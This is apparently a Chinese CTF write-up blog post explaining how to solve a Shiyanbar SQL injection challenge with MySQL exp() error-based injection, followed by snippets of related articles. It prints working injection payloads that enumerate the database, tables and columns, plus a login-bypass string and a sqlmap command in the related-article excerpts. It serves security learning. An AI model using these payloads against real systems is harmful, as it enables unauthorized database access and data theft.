实验吧Web-易-简单的sql注入之3(报错的sql盲注之exp)

最新推荐文章于 2022-06-09 22:33:15 发布
最新推荐文章于 2022-06-09 22:33:15 发布
阅读量376 收藏
点赞数
分类专栏: sql注入 实验吧web 文章标签: 实验吧 报错的SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zz_Caleb/article/details/85063838
版权
本文介绍了如何在实验吧Web-易题目中利用报错SQL盲注技巧获取信息。通过发现exp可以绕过过滤,成功进行注入。步骤包括爆库、爆表、爆列名直至获取到flag内容。参考链接提供了更多细节。
摘要由CSDN通过智能技术生成

题目提示是报错注入,于是就用盲注技巧来注入。

这里注入时发现floor,extractvalue,updatexml被吃掉了,用exp可以注入成功。(记住大小写绕过等技巧)

1.爆库

' or exp(~(select * from(select database())a))#
这里最后面的a处可为别的字母,且必须要有

可以看到库名为web1。

2,爆表

' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a))#
或者
' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema='web1')a))#

 flag应该在表flag中。

3.爆列名

' or exp(~(select * from(select group_concat(column_name) from information_schema.columns wh
最低0.47元/天 解锁文章
大千SS
关注
专栏目录
实验吧三道sql注入题目解题思路以及当中至少点整理(简单SQL注入简单SQL注入2、简单SQL注入
xiaotaode2012的专栏
08-12 4089
0x00 最近学习CTF有一段时间了,下面将实验吧三题题目的简单SQL注入进行一定的整理, 0x01 简单sql注入 做题的地址为: http://ctf5.shiyanbar.com/423/web/ 第一步:随便输入个数字load下url:http://ctf5.shiyanbar.com/423/web/?id=1发现是这个,老套路,既然题目提示是过滤 我们来各种试试到底过滤了
使用exp进行SQL报错注入
weixin_34082695的博客
08-27 637
0x01 前言概述好消息好消息~作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出来注出数据,你可以读一下作者之前发的博文:BIGINT Overflow Error based injections,drops上面也有对应翻译,具体见这里。当我们拿到MySQL里的函数时,作者比较感兴趣的是其中的数学函数,它们也应该包含一些数据类型来保存数值。所以作者...
sql注入--五个报错
weixin_44769042的博客
10-23 277
目录 通过floor()报错 报错注入之 exp() 报错注入之 BIGINT溢出错误 报错注入之 extractvalue 报错注入之 updatexml 通过floor()报错 ?id=1 and (select count(*) from information_schema.tables group by concat((select database()),floor(rand(0)*2))) ?id=1 and (select count(*) from inf.
网络安全--最简单sql注入
nuoman_cheng的博客
11-10 1074
我们平常见到的输入框: 如果用户输入: 用户名:user1 or '1'='1' 密码   : passwd1 or '1'='1' 那么,SQl会产生为: select * from  ziliao  where  username=user1 or '1'='1'  and  password = passwd1 or '1'='1' 后面的条件就永远为真,就绕过去
实验吧-简单的注sql入 writeup
qq_24966613的博客
11-29 629
解题链接: http://ctf5.shiyanbar.com/web/index_2.php 1.输入id值,通过回显发现题目应该是进行了空格过滤 2.使用sqlmap进行注入    2.1  python sqlmap.py  -u “http://ctf5.shiyanbar.com/web/index_2.php?id=1” –random-agent  –tamper=space2comm
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过构造特定的SQL语句来获取敏感信息或控制数据库。下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让...
sql盲注报错注入(附自动化脚本)
xiaoi123的博客
12-29 4750
作者:__LSA__ 0x00 概述 渗透的时候总会首先测试注入,sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲注系列的第一篇,介绍盲注中的报错注入。 0×01 报错注入原理 其实报错注入有很多种,本文主要介绍几种常见的报错方法,有新姿势后续再更新。 1. Duplicate
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1246
CTFHUB-WEB-SQL注入
WEB渗透学习笔记3——报错注入和盲注
林林木林林L的博客
07-23 679
报错注入 报错注入原理 在MYSQL中使用一些指定的函数来制造报错,后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端,从而从报错信息中获取设定的信息。select/insert/update/delete都可以使用报错来获取信息 常用的报错函数 updatexml() updatexml()函数是MYSQL对XML文档数据进行查询和修改的XPATH函数; and updatexml(xml_document,Xpathstring,new_value) updatexml(1,concat(0
牛腩学习---SQL注入
My Devil's Cry
03-27 1055
从上个星期6开始,几乎每天都看两集牛腩视频。自我感觉这个讲牛腩的老师讲得特别细致,几乎是手把手的教你如何做一个系统。正是由于这个老师教学的认真,让我明白了很多在重构的时候不是非常理解的一些概念,下面就让我来说说吧! 基础总结: 在前5集的时候,这个老师讲了数据库的设计和一些UML图的讲解!虽然和我学习的内容有一点不同,但是慢慢的听讲,感觉接受还是挺容的!到了6-8集就可以加深
注入关
weixin_43245269的博客
06-29 690
注入关1 最简单SQL注入 分值: 100 Tips题目里有简单提示 用户名:admin or '1=1' 密码:随意 成功! 注入关2 最简单SQL注入(熟悉注入环境) 分值: 100 最简单SQL注入 http://lab1.xseclab.com/sqli3_6590b07a0a39c8c27932b92b0e151456/index.php?id=1 or ‘1=1’ 获得flag。 -- 数字型注入点select * from 表名 where id=1 http://xxx
hackinglab.cn 注入关之一
r00tnb的博客
12-15 3795
题目: Tips题目里有简单提示. writeup: 第一关应该挺简单的。 点击题目地址进去,显示的是一个简单的登陆界面,还有一个验证码。 查看一下源代码,发现有一个提示: <!-- Tips login as admin--> 也就是说登录名已经告诉你了。 开始填写表单,登录名就写admin,密码随便填,验证码输入正确,等待返回结果是登录失败!预料之中,在登录名...
Python之路 | 布尔盲注、延时EXP编写
IerkeU的博客
03-29 907
什么是POC、EXP、payload? 答: ​ POC: ​ 全称为‘Proof of concept’,意为概念验证,常指为一段漏洞的证明代码 ​ 理解为:发现可能存在的漏洞后,强调对漏洞是否存在进行验证 ​ EXP: ​ 全称为‘Exploit’,意为利用,指利用系统漏洞进行攻击的动作 ​ 理解为:对已存在的漏洞进行利用,强调利用已有的资源 ​ Payload: ​ 意为有效载荷,指成功exploit之后,真正在目标系统执行的代码或指令 ​ 理解为例如使用了一条恶意SQL语句,使网站出现报
CTF解题-网安实验室(注入关)
道阻且长,行则将至。
09-03 4076
万能密码 【题目环境】 最简单SQL注入 分值: 100 Tips:题目里有简单提示 通关地址 【解题过程】 查看网页源码,提示使用admin登录: 直接上万能密码——admin';#、admin' #、admin' or 1=1 #密码随便输,登录成功: ...
SQL注入-盲注(布尔盲注与时间盲注
热门推荐
LJH1999ZN的博客
02-10 1万+
一、什么是盲注 盲注就是在sql注入过程中,sql语句执行select之后,可能由于网站代码的限制或者apache等解析器配置了不回显数据,造成在select数据之后不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个判断的过程称之为盲注。 通俗的讲就是在前端页面没有显示位,不能返回sql语句执行错误的信息,输入正确和错误返回的信息都是一致的,这时候我们就需要使用页面的正常与不正常显示来进行sql注入。 二、盲注的分类 基于布尔类型的盲注 基于时间类型的盲注 三、利用盲注
SQL注入 | exp()函数报错
JacobTsang的博客
10-30 6219
0x01原理 当传递一个大于709的值时,函数exp()就会引起一个溢出错误。 mysql> select exp(709); +-----------------------+ | exp(709) | +-----------------------+ | 8.218407461554972e307 | +-----------------------+ 1 r...
mysql exp_(转载)使用exp进行SQL报错注入
weixin_35172689的博客
01-18 870
此文为BIGINT Overflow Error Based SQL Injection的具体发现与实践0x01 前言概述好消息好消息~作者又在MySQL中发现了一个Double型数据溢出。如果你想了解利用溢出来注出数据,你可以读一下作者之前发的博文:BIGINT Overflow Error based injections,drops上面也有对应翻译,具体见这里。当我们拿到MySQL里的函数时...
CTF实验吧-简单sql注入3【sqlmap直接跑】
Sp4rkW的博客
07-23 5209
原理内容及连接: mysql报错注入 格式:flag{} 解题链接:http://ctf5.shiyanbar.com/web/index_3.php 本来以为和1,2一样的思路,加字符来过被忽略的关键字,结果,习惯性打个0'='0就发现这题有点不对劲 hello是什么鬼!! 前面的格式/**/,/*!*/都试了试,没效果,一个硕大的单词hello仿佛在嘲笑我,然后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值